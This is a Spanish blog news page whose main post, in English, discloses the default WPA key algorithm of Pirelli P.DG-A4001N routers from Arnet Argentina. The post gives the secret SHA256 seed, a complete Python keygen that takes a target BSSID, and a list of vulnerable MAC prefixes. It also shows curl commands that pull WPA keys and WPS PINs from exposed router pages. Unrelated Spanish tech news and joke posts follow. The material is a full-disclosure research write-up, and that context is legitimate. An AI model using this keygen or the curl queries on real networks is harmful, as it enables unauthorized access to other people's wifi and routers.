Archivo de la categoría: Noticias

Noticias locales

Default WPA key generation algorithm for Pirelli routers in Argentina

Introduction

arnetrouter
Sticker with default settings

A couple of years ago whether I do not remember badly, I was doing reverse engineering in some Spanish routers deployed by Pirelli as well. After I extracted the firmware and found out a suspicious library with many references to key generation’s functions everything was over. Unfortunately, I could not recover the algorithm itself. Principally, because those routers were not using the same algorithm for generating default keys and simply because such algorithm was not explicitly there. Shit happens! However, as I could not reveal the algorithm then decided to try another way to recover keys. Eventually, I realised that these routers were vulnerable to unauthorized and unauthenticated remote access and any adversary could fetch HTML code from our public IP address. Plenty of HTMLs were able to be downloaded without any restriction, meaning a huge leakage. Being vulnerable to a bunch of evil attacks. This remote information disclosure can be seen on this CVE-2015-0554. On the other side, I do not know whether Argentinian routers are also vulnerable to this vulnerability. Feel free to try it out and let me know too. Just to see how easy was to achieve those keys in the HomeStation(essids-like WLAN_XXXX) in Spain, a simple curl command was enough:

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
                  <option value='0'>WLAN_DEAD</option>
 
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';
 
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
var WscDevPin    = '12820078';
 

Today I am gonna explain how I reverse engineered a MIPS library in order to recover the default WPA key generation algorithm for some Argentinian routers deployed by Pirelli. Concretely the router affected is the model P.DG-A4001N. First of all, I am neither Argentinian nor live there. Nevertheless, accidentally I observed some stickers from Pirelli routers in a random forum and as an user had already publicly published the firmware for those routers then I decided to give a try. As I still remembered the file where I dug into for the Spanish routers, I rapidly tried to recover the algorithm in these routers. Next writing is the way I followed until to achieve it.

Reverse-engineering the default key generation algorithm

In this section, we are going to reverse engineer a MIPS library, /lib/private/libcms.core, found out in the firmware itself. First of all, let us comment that the firmware was extracted for another user (fernando3k) and subsequently extracted by using Binwalk and firmware-mod-kit. Once was mounted into our system, we found out a function called generatekey. As you have seen, symbols have not been removed in binaries and external function names are still there because dynamic compilation. This help us a lot in our reverse engineering task. On top of that, we rapidly saw how this function was calling to another one called generatekey_from_mac. At this moment, I decided to give a go to this challenge. Before get started, IDA Pro can help us with the cross references (Xrefs to-from in IDA Pro) between functions. Let’s see how functions are called in the library. (Zoom pictures in to see properly)

Call flow from generateKey
Call flow from generateKey

Really looking great! Now let’s look at the cross references. We have figured out some tips:

  1. generatekey calls generatekey_from_mac. This allow us to suppose that the mac address is involved in the key generation algorithm. Besides, getPBSHwaddr returns a mac address and it is also called by generatekey. Verification was carried out after checking how getPBSHwaddr returned the value of /var/hwaddr ( “ifconfig %s > /var/hwaddr “)
  2. SHA256 cryptographic hash function is also involved. We then know that our key is coming from a well-known hash function. This way to generate WPA keys is very popular in some vendors because the feeling of “randomness”. Digging into this function will give us the main structure of our algorithm.
  3. The function createWPAPassphraseFromKey is called by wlWriteMdmDefault ,which also calls to generatekey as well. Hence, we discover a function called bintoascii which is basically responsible to convert binary to ascii data.
  4. The SSID is also created from the mac address although it is not relevant for our task.

 

Call flow for createWPAPassphraseFromKey
Call flow for createWPAPassphraseFromKey

Now we must dissect the generatekey_from_mac function and its SHA256 callings to figure out how many parameters are being sent as input data. Before calling generatekey, a string “1236790” is sent to this function as first argument ($a3). Nonetheless, we have to guess which is the right order for the SHA256 function, I mean how many updates there are. If we observe the below picture, we will see this step.

createWPApassphrasefromkey
Dissasembly of wlWriteMdmDefault

From generateKey_from_mac we realise that: (Look at below image)

  1. First argument is located at offset 0x000d29e0
  2. Second argument is the string we discovered previously (“1236790”)
  3. Third argument it has to be the mac address because there is an instruction load immediate with the value 6. Since a mac address is 6 bytes, we can try it out now.
sha256_seed
Dissasembly of generateKey_from_mac

As we know that the first argument is located at the offset 0xd29e0, just a jump there and let’s reveal the secret seed used in the SHA256. Now we have guessed the first argument, and we can prepare those 32 bytes into a byte-array structure to generate the SHA256 hash later on. This secret seed has been used by Pirelli too in other countries like Italy or Austria (Look at the references on the source code for more info). Furthermore, below that we can also distinguish the charset finally used to generate keys with.

seed
Secret data found out in the library.

In the end, we conclude that the algorithm is as follows: (mac address needs to be incremented by 1)

SHA256(secret_seed+”1236790″+mac_address)

More details on how keys are eventually generated in this python function:

def genkey(mac):
    seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
            '\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8')
 
    lookup  = '0123456789abcdefghijklmnopqrstuvwxyz'
   
    sha256 = hashlib.sha256()
    sha256.update(seed)
    sha256.update('1236790')
    sha256.update(mac)
 
    digest = bytearray(sha256.digest())
       
    return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])

Problems

Since I attempted to do a responsible disclosure and neither ADB Pirelli nor Arnet Argentina were interested to discuss the problem, I have finally decided to do full disclosure to speed up the process of fixing. It looks like the only way with some vendors, just enforce them to replace routers for avoiding intrusions. Many things can happen whether your router with SSID Wifi-Arnet-XXXX has the default password. For your information, default passwords are located in a sticker at the bottom of routers. If you are owner of these networks, please change your password as soon as possible. You should always change the default passwords, though. An adversary, within of the wifi range, could access to your network and commit any sort of fraud. Be safe and change the passwords right now!

Timeline

2014-09-11 Found the algorithm 2014-09-12 Send a message to @ArnetOnline via Twitter @enovella_ 2014-09-15 Send a message via website, still looking for a simple mail 2014-09-16 Send another message to Arnet via website.First reply via twitter where they redirect me to the website form. 2014-09-19 Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key 2014-09-20 More twitter PM about the same. They do not want to be aware about the problem though. 2014-09-23 I assume that Arnet does not care about its clients’ security at all regarding its little interest. 2014-09-24 I send the problem to the vendor ADB Pirelli via website form 2014-09-28 I send the problem to the vendor ADB Pirelli via email to Switzerland 2015-01-05 Full disclosure

Proof-of-concept

This proof-of-concept and many Pirelli default key generation algorithms might be found at my Bitbucket repository. I hope you can use them. Also a copy&paste of the first version can be looked at below. To be installed just make sure you got git installed on your system and then run:

$ git clone https://dudux@bitbucket.org/dudux/adbpirelli.git
$ python wifiarnet.py
 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
 
'''
@license: GPLv3
@author : Eduardo Novella
@contact: ednolo[a]inf.upv.es
@twitter: @enovella_
 
-----------------
[*] Target      :
-----------------
Vendor           : ADB broadband Pirelli
Router           : Model P.DG-A4001N
ISP              : Arnet Telecom Argentina
Possible-targets : http://hwaddress.com/?q=ADB%20Broadband%20Italia
Firmware         : http://foro.seguridadwireless.net/puntos-de-acceso-routers-switchs-y-bridges/obtener-firmware-adb-p-dg-a4001n-%28arnet-telecom-argentina%29/  
 
-----------------
[*] References  :
-----------------
[0] [AUSTRIA] A1/Telekom Austria PRG EAV4202N Default WPA Key Algorithm Weakness    http://sviehb.wordpress.com/2011/12/04/prg-eav4202n-default-wpa-key-algorithm/
[1] [ITALY]   Alice AGPF: The algorithm!                                            http://wifiresearchers.wordpress.com/2010/06/02/alice-agpf-lalgoritmo/
 
-----------------
[*] Test vectors :
-----------------
http://www.arg-wireless.com.ar/index.php?topic=1006.msg6551#msg6551
 
-----------------------
[*] Acknowledgements  :
-----------------------
Thanks to fernando3k for giving me the firmware in order to do reverse-engineering on it, and christian32 for showing me a bunch of test vectors.
 
-----------------
[*] Timeline    :
-----------------
2014-09-11  Found the algorithm
2014-09-12  Send a message to @ArnetOnline via Twitter @enovella_
2014-09-15  Send a message via website, still looking for a simple mail (http://www.telecom.com.ar/hogares/contacto_tecnico.html)
2014-09-16  Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19  Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20  More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23  I assume that Arnet does not care about its clients' security at all regarding its little interest.
2014-09-24  I send the problem to the vendor ADB Pirelli via website form
2014-09-28  I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05  Full disclosure
 
-----------------
[*] TODO        :
-----------------
1.- Reverse-engineering the function generateSSIDfromTheMac. It is not relevant though.
2.- Extract more firmwares from others vendors and send them to me.
 
'''
 
import re
import sys
import hashlib
import argparse
 
VERSION     = 1
SUBVERSION  = 0
DATEVERSION = '2014-09-11'
URL         = 'http://www.ednolo.alumnos.upv.es'
 
def genkey(mac,stdout='True'):
    seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
            '\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8')
 
    lookup  = '0123456789abcdefghijklmnopqrstuvwxyz'
   
    sha256 = hashlib.sha256()
    sha256.update(seed)
    sha256.update('1236790')
    sha256.update(mac)
 
    digest = bytearray(sha256.digest())
 
    if (stdout):
        print "[+] SHA256  : %s" % sha256.hexdigest()
       
    return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])
 
 
def printTargets():
        print "[+] Possible vulnerable targets so far:"
        for t in targets:
            print ("\t bssid: {0:s}:XX:XX:XX \t essid: Wifi-Arnet-XXXX".format(t.upper()))
 
        sys.exit()
 
def checkTargets(bssid):
        supported = False
        for t in targets:
            if ( bssid.upper().startswith(t) ):
                supported = True
                break
        if (not supported):
            print "[!] Your bssid looks like not supported! Generating anyway."
       
def main():
   
    global targets
    version     = " {0:d}.{1:d}  [{2:s}] ----> {3:s}".format(VERSION,SUBVERSION,DATEVERSION,URL)
    targets = ['00:08:27','00:13:C8','00:17:C2','00:19:3E','00:1C:A2','00:1D:8B','00:22:33','00:8C:54',
    '30:39:F2','74:88:8B','84:26:15','A4:52:6F','A4:5D:A1','D0:D4:12','D4:D1:84','DC:0B:1A','F0:84:2F']
   
    parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina. So far
                                                 only WiFi networks with essid like Wifi-Arnet-XXXX and manufactured by Pirelli are
                                                 likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
                                                 Twitter: @enovella_  and   email: ednolo[at]inf.upv.es''',
                                                 epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' %(sys.argv[0])
                                    )
   
    maingroup = parser.add_argument_group(title='required')
    maingroup.add_argument('-b','--bssid', type=str, nargs='?', help='Target mac address')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s'+version)
    command_group = parser.add_mutually_exclusive_group()
    command_group.add_argument('-l','--list', help='List all vulnerable targets (essid Wifi-Arnet-XXXX)', action='store_true')
   
    args = parser.parse_args()
 
    if args.list:
        printTargets()
    elif args.bssid:
        mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid)
        if len(mac_str) != 12:
            sys.exit('[!] Check MAC format!\n')
 
        try:
            mac = bytearray.fromhex('%012x' %(int(mac_str,16) +1))
        except:
            sys.exit('[!] Use real input :)')
 
        checkTargets(args.bssid)
        print '[+] SSID    : Wifi-Arnet-XXXX'
        print '[+] MAC     : %s' % args.bssid
        print '[+] WPA key : %s' % (genkey(mac,False))
    else:
        parser.print_help()
 
if __name__ == "__main__":
    main()

00:30

Comienza la mayor feria tecnológica

El martes empieza la mayor feria de tecnología, con novedades sorprendentes.

La  Feria Internacional de Electrónica de Consumo (CES) 2015, que se celebra del 6 al 9 de enero en Las Vegas, EE.UU., se ha convertido en el centro de atención para todos los aficionados a la tecnología por su prestigio y el nivel de los proyectos que serán presentados durante el evento.

El portal PC World ha destacado los proyectos más esperados que serán presentados a lo largo del evento.

Año crucial para los televisores 4K

El 2015 será un año en el que los televisores con resolución máxima de 1080p serán reemplazados por 4K. Poco a poco llega el material audiovisual en esta definición y la mayoría de los gigantes tecnológicos apuestan por esta tecnología. Además, las grandes empresas ya desarrollan ultra-alta definición de 8K que, sin embargo, todavía seguirá siendo inaccesible para los usuarios durante algunos años.

La ‘casa inteligente’ se hace aún más inteligente

Si en 2014 el centro de atención de la feria fue la tecnología ‘wearable’, es decir, dispositivos que se incorporan de alguna manera a nuestro cuerpo con el fin de realizar funciones específicas, esta vez será el concepto de ‘casa inteligente’. Por primera vez los dispositivos relacionados con el hogar ‘inteligente’ tendrán su propia sala. Los desarrolladores aseguran que este tipo de sistemas abre la nueva era en que todo el funcionamiento de la casa (iluminación, seguridad, cerraduras de puertas, etc.) ya no dependerá de un único eje central. Controlar todo el hogar pronto se podrá hacer con un teléfono móvil o una ‘tablet’.

Los dispositivos ‘wearable’ seguirán avanzando el próximo año. Entre los más esperados se encuentran un proyecto de Thync que podrá cambiar el estado de ánimo que deseemos, ya sea tranquilidad o excitación. Por otra parte, el público conocerá las modificadas medias Sensoria Fitness, capaces de monitorizar en tiempo real todos los datos biométricos para correr sin lesiones, o Vert, un dispositivo que registra los saltos durante un partido de basquet o de voleibol.

Teléfonos y computadoras

Como cualquier otro año, los dispositivos ‘tradicionales’ también presentan sus novedades. Se espera que este año sea muy productivo para la tecnología basada en Android. De hecho, Samsung, Sony y LG podrían presentar sus nuevas generaciones de ‘smartphones’. Por otro lado, uno de los eventos más esperados de la feria está relacionado con el mercado de los computadoras: Intel presentará su nueva procesadora Broadwell-U.

Dispositivos para controlar su coche

En la feria de Las Vegas serán también centro de atención tres tecnologías que presentarán sus nuevas actualizaciones: Apple CarPlay, Android Auto y MirrorLink. La primera ofrece a los conductores una forma más inteligente, segura y divertida de usar el iPhone con solo pronunciar una palabra o con un leve toque con el dedo. Android Auto, el mayor rival de Apple CarPlay, también permite desarrollar el entretenimiento a bordo a partir de una interfaz simplificada y siguiendo órdenes de voz. Por último, los visitantes de la feria podrán conocer más sobre MirrorLink, que deja ver en la pantalla táctil del coche pantallas configuradas para móvil.

Fuente

SafeBrowse – Navega sin esperas

SafeBrowse es un plugin para los principales exploradores que te evita esperar en diferentes sitios que te obligan a ver publicidad por cierto tiempo para poder continuar al sitio que realmente te interesa, como por ejemplo Adfly o Linkbucks, si cuentas con el poder de SafeBrowse ya no tendrás que perder tiempo ni clicks valiosos, SafeBrowse te salta esos sitios automaticamente en un instante.

light-logo

Caracteristicas

  • Navega sin esperar

    SafeBrowse se salta los contadores de sitios que te ponen a esperar para poder continuar, esto quiere decir que ya no tendrás que esperar más.

  • Evita publicidad molesta

    En algunos sitios seleccionados, se elimina la publicidad molesta que ocupa casi toda la pantalla, además se evitan varios pop ups molestos.

  • Todos los navegadores

    SafeBrowse se encuentra disponible en los 6 navegadores más usados, así podrás seguir trabajando en tu navegador favorito con SafeBrowse sin problemas.

  • Imagenes como deben ser

    En varios sitios de imagenes, te mostraremos las imagenes como las quieres, sin publicidad encima, o cosas que no te dejan observarla bien, te la ponemos en primer plano, tamaño original.
    Descargas rápidas

    En los servidores más famosos de descargas SafeBrowse te reduce el tiempo de espera para descargar como usuario gratuito, esto se hace solo en aquellos servidores donde es posible.
    Soporte

    Si ya el plugin no funciona en un sitio, quieres sugerir algo o tienes otros problemas relacionados con SafeBrowse, en nuestra sección de soporte te ofrecemos ayuda.

fuente

Adblock Plus – ¡Navegue por la web sin publicidad molesta!

Bloquea banners, ventanas emergentes (pop-ups) y anuncios de vídeo – incluso en Facebook y YouTube
La publicidad no intrusiva no es bloqueada para apoyar a las páginas web (configurable)
¡Es gratuito!

  • Código abierto

    Adblock Plus es un proyecto comunitario. Únase a nosotros

  • Más de 300 millones de descargas

    Adblock Plus es la extensión de navegador más popular.

  • Privacidad garantizada

    Adblock Plus nunca recopila ninguno de tus datos personales.

Importante añadir el filtro para bloquear las webs de AEDE
https://github.com/gangsthub/FiltroAEDE

Descarga >>>>> https://adblockplus.org/

Así se hackea Windows 8

Un ingeniero de Google descubrió y dio a conocer una falla de seguridad que tiene el sistema operativo.

Google publicó un fallo de seguridad en Windows 8.1, que permite acceder a cualquier usuario como administrados, aunque no se tenga tales privilegios. El hallazgo del error se produjo en septiembre, cuando la empresa del buscador informó a Microsoft, quien no tomó ninguna medida.

“Project Zero” es una iniciativa de Google para encontrar y divulgar agujeros de seguridad en diversos softwares, si los desarrolladores no los corrigen en un plazo de 90 días. Debido a esto, en el sitio de Google Security Research se hizo visible a todo público el reporte de error que elaboraron sobre Windows 8.

“Esta es nuestra contribución para detener los sofisticados ataques que explotan vulnerabilidades; nuestro objetivo es reducir significativamentte el numero de personas perjudicadas por este tipo de ataques” anuncia Google en su blog de seguridad online.

fuente

Al sector femenino también le gusta wifislax

Hay una verdadera leyenda urbana que dice que las féminas no entran mucho a este foro, y que tampoco suelen usar wifislax, basándome en una exhaustiva investigación en estos 8 años, hemos llegado a la conclusión, que hay algún pulpo-plasta en el foro.

Pero hemos conseguido una prueba irrefutable, en la captura podeis ver a HalloKaty, prima hermana, de una persona muy famosa, que ama wifislax.

Como vereis tiene mucho parecido con su prima famosa HelloKity, pero los ojos y la boca son mas grandes.

Ya nadie podra decir, que el sector femenino, no usa wifislax

Nueva filtración – La TIA usa wifislax

Noticia en exclusiva.

Como todos bien sabemos los mejores gentes de la TIA han manifestado millones de veces que usan como SO en sus misiones determinadas distribucciones GNU/linux muy famosas en el ámbito mundial.

Pero una reciente filtración de los adentros de la TIA pone de manifiesto que es una gran mentira, y que solo usan wifislax.

Esta filtración ha sido posible gracias a un mini drone con inteligencia artificial y de espíritu open-source creado por el profesor Bacterio, el cual a captado la conversación entre algunos miembros de seguridad de dicha agencia.

Estar atentos a la grabación, notareis un poco de ruido, es debido al gran sistema de protección se seguridad que tienen en sus instalaciones, pero la captura de audio se entiende perfectamente, hasta que dichos miembros se han dado cuenta de que los espiaban.

Se espera una notificación publica en los próximos días.

El drone pudo trasmitir esta grabación a la redacción de seguridadwireless antes de ser destruido.

También disponemos de la grabación de vídeo, la cual omitimos para prevalecer los derechos de imágenes de dichos miembros.

Aquí teneís la grabación en exclusiva

Podcast

 

Morira Internet Explorer en el 2015

Se rumorea en el país mas poderoso del mundo, osease EEUU, en el imperio español no lo se, porque lo único que leo es el diari de tarragona y porque lo regalan en algunos sitios, que IE podría ser substituido en el año 2015.

Su cuota de mercado actual es del 20%, creo que son los mismos paletos que preguntan “Que usas google o el firefox”, asociando google como que es el navegador que lleva su windows de serie.

    La cuota de mercado del 2010 era del 50%
  • Microsoft prometío solucionar todos los problemas y tenia en mente incorporar grandes cambios, tal es el cambio que sera un proyecto nuevo que se llama Sparta
  • Internet Explorer entro en escena en 1995 como parte de Windows 95 y su fama fue brutal. Se comio a Netscape Navigator, y alcanzó monopolio en los comienzos de la década de 2000. Su mayor éxito ocurrío en el año 2002 con una cuota de mercado del 95%. Aun tengo un libro del 1996 de como usar Navigator.

  • Internet Explorer 6 duro 6 años, y Microsoft no innovo nada, dejo que le saliera el polvo, y por lo tanto todos nos pasamos primero a firefox y luego a google chromme.
  • R.I.P Internet Explorer

    Espadas que brillan cuando detectan wifi abiertas

    Antes que nada , agradecer al gobierno del PP por limitar nuestros recursos y tener que buscarnos la vida en otros paises, les doy las gracias por practicar de nuevo mi ingles en ayuda de google traslate.

    Buscando alguna noticia interesante fuera del ambito de la ley AEDE, me he encontrado con algo bastante friki.

    Os acordais de Frodo del señor de los anillos y como brillaba su espada cuando se encontraba con esos orkos tan hermosos, pues bien, una empresa que tiene cositas interesantes en su web para el mundo wireless, nos regala, asi de forma gratuita, un tutorial de como construir una espada que brilla cuando detecta wifis gratis.

    Aqui teneis el link de su tutorial : http://blog.spark.io/2014/12/17/warsting-a-wifi-scanning-sword-for-hobbits/

    Cierre de NiagaRank

    NiagaRank es un servicio que funciona como una escucha activa en redes sociales.

    Consideran que les podría afectar el punto 3.2 de la LPI que penaliza los sistemas automatizado de agregación de noticias.

    Así que como todos estamos haciendo se curan en saluda y cierran sin mas, lo mismo que estamos haciendo nosotros, solo tenéis que entrar a twitter o todas las noticias que nos hemos cargado de los portales y el foro.

    No sera el único creo yo, que tome esta medida, interesante ver lo que hagan los de meneame.

    Supongo se espera a que todo de marcha atras, o quizas todo cambie en las futuras elecciones generales.

    Yo personalmente, pienso que aunque se de vuelta atrás, no pienso poner ningún enlace ni fragmento del séquito AEDE.